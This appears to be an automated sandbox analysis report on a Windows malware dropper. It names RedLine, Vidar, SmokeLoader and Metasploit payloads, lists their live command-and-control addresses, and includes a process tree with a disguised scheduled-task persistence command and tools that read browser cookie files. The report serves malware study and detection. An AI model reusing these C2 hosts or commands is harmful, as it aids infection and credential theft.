Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    1801s
  • max time network
    1808s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    21-08-2021 07:49

General

  • Target

    Setup (19).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

Second_7.5K

C2

45.14.49.200:27625

Extracted

Family

redline

Botnet

www

C2

185.204.109.146:54891

Extracted

Family

redline

Botnet

19.08

C2

95.181.172.100:6795

Extracted

Family

redline

Botnet

20_8_rs

C2

jekorikani.xyz:80

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32
rc4.i32

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 11 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • Blocklisted process makes network request 23 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 11 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 12 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 19 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 29 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 33 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 11 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 32 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 25 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 36 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2688
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2676
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
        • Suspicious use of SetThreadContext
        • Modifies registry class
        PID:2560
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k SystemNetworkService
          2⤵
          • Checks processor information in registry
          • Modifies data under HKEY_USERS
          • Modifies registry class
          PID:3992
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2364
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2340
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1916
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1448
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1304
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1228
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1108
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:908
                      • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                        C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                        2⤵
                        • Loads dropped DLL
                        • Enumerates connected drives
                        • Modifies system certificate store
                        • Suspicious use of FindShellTrayWindow
                        PID:6196
                      • C:\Users\Admin\AppData\Roaming\gwfbtrr
                        C:\Users\Admin\AppData\Roaming\gwfbtrr
                        2⤵
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5724
                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
                        2⤵
                          PID:8404
                          • C:\Windows\SysWOW64\schtasks.exe
                            /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
                            3⤵
                            • Blocklisted process makes network request
                            • Loads dropped DLL
                            • Enumerates connected drives
                            • Creates scheduled task(s)
                            PID:7560
                        • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                          C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                          2⤵
                            PID:1180
                          • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                            C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                            2⤵
                              PID:4688
                            • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                              C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                              2⤵
                                PID:7536
                              • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                2⤵
                                  PID:8144
                                • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                  C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                  2⤵
                                    PID:7012
                                  • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                    C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                    2⤵
                                      PID:7832
                                    • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                      C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                      2⤵
                                        PID:3464
                                      • C:\Users\Admin\AppData\Roaming\gwfbtrr
                                        C:\Users\Admin\AppData\Roaming\gwfbtrr
                                        2⤵
                                        • Checks SCSI registry key(s)
                                        • Suspicious behavior: MapViewOfSection
                                        PID:2156
                                      • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                        C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                        2⤵
                                          PID:5656
                                        • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                          C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                          2⤵
                                            PID:8200
                                          • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                            C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                            2⤵
                                              PID:3424
                                            • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                              C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                              2⤵
                                                PID:6440
                                              • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                2⤵
                                                  PID:9152
                                                • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                  C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                  2⤵
                                                    PID:2092
                                                  • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                    C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                    2⤵
                                                      PID:10056
                                                    • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                      C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                      2⤵
                                                        PID:8036
                                                      • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                        C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                        2⤵
                                                          PID:9268
                                                        • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                          C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                          2⤵
                                                            PID:6172
                                                          • C:\Users\Admin\AppData\Roaming\gwfbtrr
                                                            C:\Users\Admin\AppData\Roaming\gwfbtrr
                                                            2⤵
                                                            • Checks SCSI registry key(s)
                                                            • Suspicious behavior: MapViewOfSection
                                                            PID:5472
                                                          • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                            C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                            2⤵
                                                              PID:7288
                                                            • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                              C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                              2⤵
                                                                PID:6384
                                                              • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                2⤵
                                                                  PID:1048
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                1⤵
                                                                  PID:296
                                                                • C:\Users\Admin\AppData\Local\Temp\Setup (19).exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\Setup (19).exe"
                                                                  1⤵
                                                                  • Checks computer location settings
                                                                  • Modifies system certificate store
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:740
                                                                  • C:\Users\Admin\Documents\M1yyNUwJaOorUdEFlZfaiXl6.exe
                                                                    "C:\Users\Admin\Documents\M1yyNUwJaOorUdEFlZfaiXl6.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Checks BIOS information in registry
                                                                    • Checks whether UAC is enabled
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2760
                                                                  • C:\Users\Admin\Documents\t2cY62eALOg5bONAuPb2nJC1.exe
                                                                    "C:\Users\Admin\Documents\t2cY62eALOg5bONAuPb2nJC1.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2700
                                                                    • C:\Users\Admin\AppData\Roaming\5770928.exe
                                                                      "C:\Users\Admin\AppData\Roaming\5770928.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4260
                                                                    • C:\Users\Admin\AppData\Roaming\5273596.exe
                                                                      "C:\Users\Admin\AppData\Roaming\5273596.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Adds Run key to start application
                                                                      PID:4520
                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        PID:4752
                                                                  • C:\Users\Admin\Documents\EAyPLOkTE45uC0iCS5xc_E_F.exe
                                                                    "C:\Users\Admin\Documents\EAyPLOkTE45uC0iCS5xc_E_F.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2232
                                                                  • C:\Users\Admin\Documents\hKeBD3nBWJgb1CMCxSkr6fSZ.exe
                                                                    "C:\Users\Admin\Documents\hKeBD3nBWJgb1CMCxSkr6fSZ.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    PID:2640
                                                                  • C:\Users\Admin\Documents\qBjZSqzA8_1gEdY2DOEeOD0v.exe
                                                                    "C:\Users\Admin\Documents\qBjZSqzA8_1gEdY2DOEeOD0v.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    PID:3692
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3692 -s 660
                                                                      3⤵
                                                                      • Program crash
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1096
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3692 -s 676
                                                                      3⤵
                                                                      • Program crash
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2932
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3692 -s 684
                                                                      3⤵
                                                                      • Program crash
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4336
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3692 -s 716
                                                                      3⤵
                                                                      • Program crash
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2172
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3692 -s 892
                                                                      3⤵
                                                                      • Program crash
                                                                      PID:5388
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3692 -s 1136
                                                                      3⤵
                                                                      • Program crash
                                                                      PID:5920
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3692 -s 1088
                                                                      3⤵
                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                      • Program crash
                                                                      PID:6112
                                                                  • C:\Users\Admin\Documents\ZuMdyhgZvxPoqwuoaBanJV78.exe
                                                                    "C:\Users\Admin\Documents\ZuMdyhgZvxPoqwuoaBanJV78.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Checks BIOS information in registry
                                                                    • Checks whether UAC is enabled
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4088
                                                                  • C:\Users\Admin\Documents\AdXLgHS4ZC7GMc_rBelFf9EN.exe
                                                                    "C:\Users\Admin\Documents\AdXLgHS4ZC7GMc_rBelFf9EN.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Drops file in Program Files directory
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:3712
                                                                    • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                      "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      PID:4316
                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        PID:4900
                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        PID:5532
                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        4⤵
                                                                          PID:4332
                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          4⤵
                                                                            PID:7892
                                                                        • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                          "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          PID:4436
                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            PID:4300
                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            PID:4648
                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            PID:5468
                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            PID:5168
                                                                          • C:\Windows\system32\WerFault.exe
                                                                            C:\Windows\system32\WerFault.exe -u -p 4436 -s 1416
                                                                            4⤵
                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                            • Program crash
                                                                            PID:5820
                                                                        • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                          "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Checks whether UAC is enabled
                                                                          • Drops file in Program Files directory
                                                                          PID:4372
                                                                      • C:\Users\Admin\Documents\HO2sfx2aklmT9oPozX_Gy_AR.exe
                                                                        "C:\Users\Admin\Documents\HO2sfx2aklmT9oPozX_Gy_AR.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:3336
                                                                        • C:\Users\Admin\Documents\HO2sfx2aklmT9oPozX_Gy_AR.exe
                                                                          C:\Users\Admin\Documents\HO2sfx2aklmT9oPozX_Gy_AR.exe
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:4776
                                                                      • C:\Users\Admin\Documents\ErnPocu4teXqWnL9M6QxXSAW.exe
                                                                        "C:\Users\Admin\Documents\ErnPocu4teXqWnL9M6QxXSAW.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Checks BIOS information in registry
                                                                        • Checks whether UAC is enabled
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:3604
                                                                      • C:\Users\Admin\Documents\PTiTRBrGhbinvK_Lru0QK9TI.exe
                                                                        "C:\Users\Admin\Documents\PTiTRBrGhbinvK_Lru0QK9TI.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        PID:2240
                                                                        • C:\Users\Admin\Documents\PTiTRBrGhbinvK_Lru0QK9TI.exe
                                                                          C:\Users\Admin\Documents\PTiTRBrGhbinvK_Lru0QK9TI.exe
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:4812
                                                                      • C:\Users\Admin\Documents\wHc_rT7TuOb8ZuIEtrKr8UfG.exe
                                                                        "C:\Users\Admin\Documents\wHc_rT7TuOb8ZuIEtrKr8UfG.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        PID:804
                                                                        • C:\Users\Admin\Documents\wHc_rT7TuOb8ZuIEtrKr8UfG.exe
                                                                          "C:\Users\Admin\Documents\wHc_rT7TuOb8ZuIEtrKr8UfG.exe" -q
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          PID:4196
                                                                      • C:\Users\Admin\Documents\ly1qAn4fB7f5it_r6AKSBCum.exe
                                                                        "C:\Users\Admin\Documents\ly1qAn4fB7f5it_r6AKSBCum.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Checks SCSI registry key(s)
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious behavior: MapViewOfSection
                                                                        PID:4112
                                                                      • C:\Users\Admin\Documents\DY2NR2IGNDTxSm1gyai1hQyD.exe
                                                                        "C:\Users\Admin\Documents\DY2NR2IGNDTxSm1gyai1hQyD.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        PID:4016
                                                                        • C:\Users\Admin\Documents\DY2NR2IGNDTxSm1gyai1hQyD.exe
                                                                          "C:\Users\Admin\Documents\DY2NR2IGNDTxSm1gyai1hQyD.exe"
                                                                          3⤵
                                                                          • Modifies data under HKEY_USERS
                                                                          PID:9788
                                                                      • C:\Users\Admin\Documents\Wc3Ms_9YilHUMgTZ_22EJV7Q.exe
                                                                        "C:\Users\Admin\Documents\Wc3Ms_9YilHUMgTZ_22EJV7Q.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:1792
                                                                        • C:\Users\Admin\Documents\Wc3Ms_9YilHUMgTZ_22EJV7Q.exe
                                                                          C:\Users\Admin\Documents\Wc3Ms_9YilHUMgTZ_22EJV7Q.exe
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          PID:4884
                                                                        • C:\Users\Admin\Documents\Wc3Ms_9YilHUMgTZ_22EJV7Q.exe
                                                                          C:\Users\Admin\Documents\Wc3Ms_9YilHUMgTZ_22EJV7Q.exe
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:3744
                                                                      • C:\Users\Admin\Documents\ezaXmShwOzq3I5O4rPzx3dgh.exe
                                                                        "C:\Users\Admin\Documents\ezaXmShwOzq3I5O4rPzx3dgh.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:3400
                                                                      • C:\Users\Admin\Documents\mInZKsYmSwO5bHgCEKT5zqMx.exe
                                                                        "C:\Users\Admin\Documents\mInZKsYmSwO5bHgCEKT5zqMx.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Checks BIOS information in registry
                                                                        • Checks whether UAC is enabled
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4172
                                                                      • C:\Users\Admin\Documents\dXUZgitUrv0bdmyMXcbYkc9k.exe
                                                                        "C:\Users\Admin\Documents\dXUZgitUrv0bdmyMXcbYkc9k.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        PID:4256
                                                                      • C:\Users\Admin\Documents\Drsb3GGbTQld7zBl2yQepSES.exe
                                                                        "C:\Users\Admin\Documents\Drsb3GGbTQld7zBl2yQepSES.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        PID:4244
                                                                        • C:\Users\Admin\AppData\Local\Temp\is-4JT4E.tmp\Drsb3GGbTQld7zBl2yQepSES.tmp
                                                                          "C:\Users\Admin\AppData\Local\Temp\is-4JT4E.tmp\Drsb3GGbTQld7zBl2yQepSES.tmp" /SL5="$60060,138429,56832,C:\Users\Admin\Documents\Drsb3GGbTQld7zBl2yQepSES.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          PID:4512
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-UJP3N.tmp\Setup.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-UJP3N.tmp\Setup.exe" /Verysilent
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            • Drops file in Program Files directory
                                                                            PID:3728
                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              PID:4564
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 760
                                                                                6⤵
                                                                                • Program crash
                                                                                PID:4228
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 812
                                                                                6⤵
                                                                                • Program crash
                                                                                PID:5260
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 792
                                                                                6⤵
                                                                                • Program crash
                                                                                PID:2772
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 824
                                                                                6⤵
                                                                                • Program crash
                                                                                PID:6152
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 808
                                                                                6⤵
                                                                                • Program crash
                                                                                PID:6932
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 1088
                                                                                6⤵
                                                                                • Program crash
                                                                                PID:7220
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 1092
                                                                                6⤵
                                                                                • Program crash
                                                                                PID:7920
                                                                              • C:\Windows\SysWOW64\WerFault.exe
